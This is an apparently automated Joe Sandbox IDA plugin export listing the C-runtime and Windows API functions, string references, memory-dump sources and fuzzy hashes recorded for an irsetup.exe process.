Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: _amsg_exit_getptd$_lock
String ID:
API String ID: 3670291111-0
Opcode ID: 91f2677a30e6242cfe2f2c7e8f7ef960797a2fefed02ff18cb049ef4cbc26dd5
Instruction ID: 61c887a7ca1b199b63e1da42a3a7a228dbf4b95799d8e10ffc124ceb316df03f
Opcode Fuzzy Hash: 91f2677a30e6242cfe2f2c7e8f7ef960797a2fefed02ff18cb049ef4cbc26dd5
Instruction Fuzzy Hash: 13F0F955A3A142C6FB58AF5D9E42BB82261EF58744F085138DA2DCB3DEFF5CA440C710

Analysis Process: irsetup.exePID: 6980, Parent PID: 2632COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	455
Total number of Limit Nodes:	20

Executed Functions

Function 0000000180029E74 Relevance: 10.6, APIs: 7, Instructions: 87
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000018002D374: HeapCreate.KERNEL32(?,?,?,?,0000000180029E89), ref: 000000018002D386
Part of subcall function 000000018002D374: HeapSetInformation.KERNEL32 ref: 000000018002D3B0

_RTC_Initialize.LIBCMT ref: 0000000180029EA4
GetCommandLineA.KERNEL32 ref: 0000000180029EA9

Part of subcall function 0000000180038D00: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D2F
Part of subcall function 0000000180038D00: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D6F

Part of subcall function 000000018002C830: GetStartupInfoA.KERNEL32 ref: 000000018002C855

__setargv.LIBCMT ref: 0000000180029ED2
_cinit.LIBCMT ref: 0000000180029EE6

Part of subcall function 000000018002C178: FlsFree.KERNEL32(?,?,?,?,0000000180029F37), ref: 000000018002C187
Part of subcall function 000000018002C178: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1A6
Part of subcall function 000000018002C178: free.LIBCMT ref: 000000018002D1AF
Part of subcall function 000000018002C178: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1CF

Part of subcall function 000000018002CB20: free.LIBCMT ref: 000000018002CB67

Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D

FlsSetValue.KERNEL32 ref: 0000000180029F6C
GetCurrentThreadId.KERNEL32 ref: 0000000180029F80
free.LIBCMT ref: 0000000180029F8F

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
String ID:
API String ID: 1549890855-0
Opcode ID: a0acf61c1b87e16a772799abe4b62362619cbdfa8acdc2e6844dc3a99a0f0c98
Instruction ID: 5d89b5062d79ddf7cbf42b6751900f03d5044372f9c69ff6a2a4972f2435356c
Opcode Fuzzy Hash: a0acf61c1b87e16a772799abe4b62362619cbdfa8acdc2e6844dc3a99a0f0c98
Instruction Fuzzy Hash: CC315A3060260D85FEE7B7F096423FE13946F5D3D4F22C525B916852E7EE258B8C8322

Function 000000018002E8A4 Relevance: 9.1, APIs: 6, Instructions: 122
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_getptd.LIBCMT ref: 000000018002E8C3

Part of subcall function 000000018002E4E0: _getptd.LIBCMT ref: 000000018002E4EA

Part of subcall function 000000018002E59C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,000000018002E8DE,?,?,?,?,?,000000018002EAB3), ref: 000000018002E5C6

Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92

free.LIBCMT ref: 000000018002E94F

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

_lock.LIBCMT ref: 000000018002E987
free.LIBCMT ref: 000000018002EA37
free.LIBCMT ref: 000000018002EA67
_errno.LIBCMT ref: 000000018002EA6C

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
String ID:
API String ID: 2878544890-0
Opcode ID: e82f143c23f227001045ea17cfd9d9e54a22bd3adced516c1c47190338206767
Instruction ID: c776ccf790241ac67246d89d90e9fa713756aa25b18aceaf8fd82d01af155c51
Opcode Fuzzy Hash: e82f143c23f227001045ea17cfd9d9e54a22bd3adced516c1c47190338206767
Instruction Fuzzy Hash: CB51B231600A8886E7E39B65A4403E9B7A1F78ABD8F14C216FA5E473A5CF78D649C701

Function 000000018002D374 Relevance: 3.0, APIs: 2, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32(?,?,?,?,0000000180029E89), ref: 000000018002D386
HeapSetInformation.KERNEL32 ref: 000000018002D3B0

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Heap$CreateInformation
String ID:
API String ID: 1774340351-0
Opcode ID: 39044132f5a22a3317da2d95eb259efacad0cdd120c364843a2d6d13d7c05708
Instruction ID: d86c038a14694898d099bceb00610aad7d4d496ac8821e0f5eb4db07846aa6a7
Opcode Fuzzy Hash: 39044132f5a22a3317da2d95eb259efacad0cdd120c364843a2d6d13d7c05708
Instruction Fuzzy Hash: 30E04F75621B84C2F7DAAB21E8457A66290F78C380F909029F94942B94DF7DC2498B00

Function 000000018002BF5C Relevance: 2.5, APIs: 2, Instructions: 30
sleepCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.LIBCMT ref: 000000018002BF7B

Part of subcall function 000000018002D3E0: _FF_MSGBANNER.LIBCMT ref: 000000018002D410
Part of subcall function 000000018002D3E0: HeapAlloc.KERNEL32(?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5), ref: 000000018002D435
Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D459
Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D464

Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$AllocHeapSleepmalloc
String ID:
API String ID: 496785850-0
Opcode ID: c64cacc54551c1d413d26b4b77fca54a5991493b7637ea44cfe571c06a399083
Instruction ID: ccdb5c5ed8c45f556dc77aec0225093e2b7ac281c4f631198e9e49a815c37d6e
Opcode Fuzzy Hash: c64cacc54551c1d413d26b4b77fca54a5991493b7637ea44cfe571c06a399083
Instruction Fuzzy Hash: 31F0FC32205A8C82E6D79F26E58036EB360F78CBD4F558124FA5D03795CF38CA958F00

Function 00000001800034F0 Relevance: 1.3, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.LIBCMT ref: 00000001800034FF

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ErrorFreeHeapLast_errnofree
String ID:
API String ID: 3856698052-0
Opcode ID: 2acc962203dc7ae12ea3bb038dd3365208552806d81bcc30d1bb0bb085e2326a
Instruction ID: 24eefc2905acafd760541be8a1a1f06bbdc94ff17dd78c782732821f245c605b
Opcode Fuzzy Hash: 2acc962203dc7ae12ea3bb038dd3365208552806d81bcc30d1bb0bb085e2326a
Instruction Fuzzy Hash: 00C08C94F52F0E82DDAEE2A308D27F800C107AFBC0D80C420F80A8A380DC1CC3AB0B00

Non-executed Functions

Function 0000000180020C38 Relevance: 54.7, APIs: 26, Strings: 5, Instructions: 493COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180020C78

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180020CAA

Strings

w, xrefs: 0000000180020DA0
PATH, xrefs: 00000001800210D3
/c , xrefs: 0000000180020F86, 0000000180020FD6
COMSPEC, xrefs: 0000000180020EAE
cmd.exe, xrefs: 0000000180020EEF

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID: /c $COMSPEC$PATH$cmd.exe$w
API String ID: 2310398763-3679458415
Opcode ID: 500590a71f3528d87d2e0ac02872d3b0dafdd78488768c422d5b14c18cecb6bd
Instruction ID: 9f0d6bfb52196638ce6bad66fd6574380d9c8f482639ba9c857dbbd3f1092ba9
Opcode Fuzzy Hash: 500590a71f3528d87d2e0ac02872d3b0dafdd78488768c422d5b14c18cecb6bd
Instruction Fuzzy Hash: 4522B23220478886FBB7DB65A4517EEB391F78D7C4F548125BA8987B96CF38C649CB00

Function 0000000180032638 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 468COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0000000180032689
_errno.LIBCMT ref: 0000000180032690

Strings

U, xrefs: 0000000180032C47

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID: U
API String ID: 921712934-4171548499
Opcode ID: 48a7f9feffc5bfc5e053856909e6f80eec15adabe95c1eaed7459d9126117ee3
Instruction ID: b99c78c3d65ca0191b994378c1241e68cd305618541e39d27e1f96f7d254ba1e
Opcode Fuzzy Hash: 48a7f9feffc5bfc5e053856909e6f80eec15adabe95c1eaed7459d9126117ee3
Instruction Fuzzy Hash: BF12B23221464986EBA38F25E4443EBB7A0F78C7C4F568116FA89477A5DF39C64DCB10

Function 0000000180037DC8 Relevance: 28.9, APIs: 19, Instructions: 377COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037E3A
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037E50
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037EFA
malloc.LIBCMT ref: 0000000180037F6B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037FA2
LCMapStringW.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180037FC7
LCMapStringW.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180038017
malloc.LIBCMT ref: 000000018003806A
LCMapStringW.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 00000001800380A4
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 00000001800380E7
free.LIBCMT ref: 00000001800380F8
free.LIBCMT ref: 0000000180038106
LCMapStringA.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 0000000180038195
malloc.LIBCMT ref: 0000000180038203
LCMapStringA.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 000000018003824C
free.LIBCMT ref: 0000000180038294
LCMapStringA.KERNEL32(?,?,?,?,?,?,00000000,?,00000140,?,?,0000000180038379), ref: 00000001800382B4
free.LIBCMT ref: 00000001800382C6
free.LIBCMT ref: 00000001800382D8

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: String$free$ByteCharMultiWidemalloc$ErrorLast
String ID:
API String ID: 1837315383-0
Opcode ID: cacc80e21e0b7faa225b9fdaf443091b09f2c2604889e9d2f947d49bd1adc46f
Instruction ID: a7cd305ef16002d982a5c2a4af8f81cce234251d115d984bdccc4e66b87c68b2
Opcode Fuzzy Hash: cacc80e21e0b7faa225b9fdaf443091b09f2c2604889e9d2f947d49bd1adc46f
Instruction Fuzzy Hash: D8F19F32200B888AE7A78F25D4407DA77A1FB4CBE8F568615FA5957BD4DF38CB498700

Function 00000001800352F8 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018003532B

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018003536A
_errno.LIBCMT ref: 000000018003537A
_errno.LIBCMT ref: 000000018003539F
_errno.LIBCMT ref: 00000001800355AA
_errno.LIBCMT ref: 00000001800355B4
free.LIBCMT ref: 00000001800355C4
free.LIBCMT ref: 00000001800355D3

Strings

PATH, xrefs: 00000001800353C3

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$free$DecodePointer
String ID: PATH
API String ID: 3098740396-1036084923
Opcode ID: 7f8aa0d2bc419b7ac494ea42fc3385d60b1a286c2162d3fafcbbe687e9060918
Instruction ID: 9a3c46973cae5f37c669a60ded91cf3780b69c90c913b2de57871a32441f2394
Opcode Fuzzy Hash: 7f8aa0d2bc419b7ac494ea42fc3385d60b1a286c2162d3fafcbbe687e9060918
Instruction Fuzzy Hash: 0C711631201A8841FBE3AA2195617FF2382AB8D7D9F45C522FE9A077D6DE38C74D8701

Function 000000018003029C Relevance: 18.2, APIs: 12, Instructions: 211COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00000001800302CD
_errno.LIBCMT ref: 00000001800302D4

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

__doserrno.LIBCMT ref: 0000000180030313
_errno.LIBCMT ref: 000000018003031A

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno$DecodePointer
String ID:
API String ID: 3911551546-0
Opcode ID: 552b4b0fef55a77f0b16bb130acd12287ff159c4b9a0ed71046dbff09db99d99
Instruction ID: 164ba2cb6b460aa59382b2c1d58f859bc5e2f64025dd1feaf38bdf79f172ba54
Opcode Fuzzy Hash: 552b4b0fef55a77f0b16bb130acd12287ff159c4b9a0ed71046dbff09db99d99
Instruction Fuzzy Hash: D591E232214A8882EB93DF65E4907EF7B61F3887D0F558116FA8907BA5CF78C548CB00

Function 000000018003A8E4 Relevance: 18.1, APIs: 12, Instructions: 115memoryfileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000180039400: _errno.LIBCMT ref: 0000000180039422

_errno.LIBCMT ref: 000000018003A96C

Part of subcall function 0000000180039400: SetFilePointer.KERNEL32(00000000,?,00000001,0000000180032E64,?,00000000,?,00000000,00000000,0000000180032611,?,?,%.14g,000000018002D5DA), ref: 0000000180039442
Part of subcall function 0000000180039400: GetLastError.KERNEL32(?,00000000,?,00000000,00000000,0000000180032611,?,?,%.14g,000000018002D5DA,?,?,00000200,000000018002E089), ref: 0000000180039451

GetProcessHeap.KERNEL32 ref: 000000018003A93E
HeapAlloc.KERNEL32 ref: 000000018003A953
_errno.LIBCMT ref: 000000018003A961
__doserrno.LIBCMT ref: 000000018003A9C6
_errno.LIBCMT ref: 000000018003A9D0
GetProcessHeap.KERNEL32 ref: 000000018003A9E9
HeapFree.KERNEL32 ref: 000000018003A9F7
SetEndOfFile.KERNEL32 ref: 000000018003AA22
_errno.LIBCMT ref: 000000018003AA39
__doserrno.LIBCMT ref: 000000018003AA44
GetLastError.KERNEL32 ref: 000000018003AA4C

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$Heap$ErrorFileLastProcess__doserrno$AllocFreePointer
String ID:
API String ID: 3112900366-0
Opcode ID: 1acf10fccda49597a569ff7a61e3d259f8e1ce3ac393ce0a89e29cdfbef2b00e
Instruction ID: 8eb280900b96f9cb44dac23b3b5a6d05d6d782666a4f137379f29f380706e389
Opcode Fuzzy Hash: 1acf10fccda49597a569ff7a61e3d259f8e1ce3ac393ce0a89e29cdfbef2b00e
Instruction Fuzzy Hash: 2E419F3530495846FAA7AB759D043EE7391A74EBF0F06C712BA79077D2DE38864A8701

Function 000000018003CD74 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 354COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018003CE28
__doserrno.LIBCMT ref: 000000018003CE33

Part of subcall function 000000018002649C: _lock.LIBCMT ref: 00000001800264BF
Part of subcall function 000000018002649C: _errno.LIBCMT ref: 00000001800264D1

free.LIBCMT ref: 000000018003CEF5
free.LIBCMT ref: 000000018003CFD4
_errno.LIBCMT ref: 000000018003CFDF
__doserrno.LIBCMT ref: 000000018003CFEA

Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A

free.LIBCMT ref: 000000018003D212
free.LIBCMT ref: 000000018003D228

Strings

SystemRoot, xrefs: 000000018003CD97
cmd.exe, xrefs: 000000018003CD76, 000000018003CD77

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$_errno$ExceptionFilterProcessUnhandled__doserrno$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual_lock
String ID: SystemRoot$cmd.exe
API String ID: 2783816385-1915010242
Opcode ID: f435228b7c99033ebf9bbf731d6440864f99d1bda75eeee7b1c28e628a164daa
Instruction ID: 7d2aedf081fda9467836d831cf405406e94ff08d2ab400320d1a2de9d3ad4fb8
Opcode Fuzzy Hash: f435228b7c99033ebf9bbf731d6440864f99d1bda75eeee7b1c28e628a164daa
Instruction Fuzzy Hash: 44E1D03220568886EBA3DF25E5507EF6791F78DBC4F06C122FA4A97B95CF38C6498701

Function 000000018003779C Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00000001800377BE
GetUserDefaultLCID.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 00000001800378BE
IsValidCodePage.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 000000018003790F
IsValidLocale.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 0000000180037925
GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 00000001800379A0
GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,0000000180028F80), ref: 00000001800379BD
_itow_s.LIBCMT ref: 00000001800379DB

Strings

Norwegian-Nynorsk, xrefs: 0000000180037960

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
String ID: Norwegian-Nynorsk
API String ID: 2273835618-461349085
Opcode ID: cd1b9dbfe264d746d2e8f6b4703a042a5d78dbd1592c6507181496ebb6678025
Instruction ID: 761428af2cddcf0ece5004559499aa7377a8e36176df394555f2b51de48901ed
Opcode Fuzzy Hash: cd1b9dbfe264d746d2e8f6b4703a042a5d78dbd1592c6507181496ebb6678025
Instruction Fuzzy Hash: 75616F7630078886FBB78F21D4453EA23A0E748BC8F1AC526EA4D467D6DF78CA49C351

Function 000000018002759C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 000000018002649C: _lock.LIBCMT ref: 00000001800264BF
Part of subcall function 000000018002649C: _errno.LIBCMT ref: 00000001800264D1

_errno.LIBCMT ref: 0000000180027624
_errno.LIBCMT ref: 000000018002762B
_errno.LIBCMT ref: 000000018002764D

Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
